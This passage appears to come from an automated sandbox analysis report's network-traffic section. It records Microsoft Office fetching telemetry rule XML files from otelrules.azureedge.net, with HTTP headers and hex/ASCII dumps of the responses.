                                                                                                                                                            2024-10-08 03:09:07 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            121192.168.2.54984613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:07 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:07 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:07 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1401
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                                            x-ms-request-id: 6bee43b5-001e-00a2-2106-17d4d5000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030907Z-1657d5bbd48xdq5dkwwugdpzr000000004mg00000000qsym
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:07 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            122192.168.2.54984713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:08 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:08 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1364
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                                            x-ms-request-id: 04600955-801e-00ac-55f4-16fd65000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030908Z-1657d5bbd48qjg85buwfdynm5w00000004m0000000000cby
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:08 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            123192.168.2.54985113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:08 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:08 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1366
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                                            x-ms-request-id: 08c5e976-701e-0021-2adc-183d45000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030908Z-1657d5bbd48t66tjar5xuq22r800000004c000000000an24
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:08 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            124192.168.2.54985013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:08 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:08 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1403
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                                            x-ms-request-id: 87e26173-201e-0051-15e7-167340000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030908Z-1657d5bbd482tlqpvyz9e93p5400000004g0000000008wbb
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:08 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            125192.168.2.54984813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:08 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:08 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1397
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                                            x-ms-request-id: 4035d6e2-a01e-0002-4602-175074000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030908Z-1657d5bbd48q6t9vvmrkd293mg000000049000000000nnvk
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:08 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            126192.168.2.54984913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:08 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:08 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1360
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                                            x-ms-request-id: 62f7f1ae-f01e-0096-4d0c-1710ef000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030908Z-1657d5bbd48vhs7r2p1ky7cs5w00000004q000000000ddyp
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:08 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            127192.168.2.54985213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:08 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:08 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1397
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                                            x-ms-request-id: 31868579-401e-008c-0af2-1686c2000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030908Z-1657d5bbd48tqvfc1ysmtbdrg0000000044g00000000sd70
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:09 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            128192.168.2.54985613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:09 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:09 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1390
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                                            x-ms-request-id: 7d21ea5d-701e-0098-0502-17395f000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030909Z-1657d5bbd48cpbzgkvtewk0wu000000004c000000000r1mv
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:09 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            129192.168.2.54985313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:09 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:09 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1360
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                            x-ms-request-id: f076ebb2-f01e-001f-3766-175dc8000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030909Z-1657d5bbd48xsz2nuzq4vfrzg8000000045000000000rmvh
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:09 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


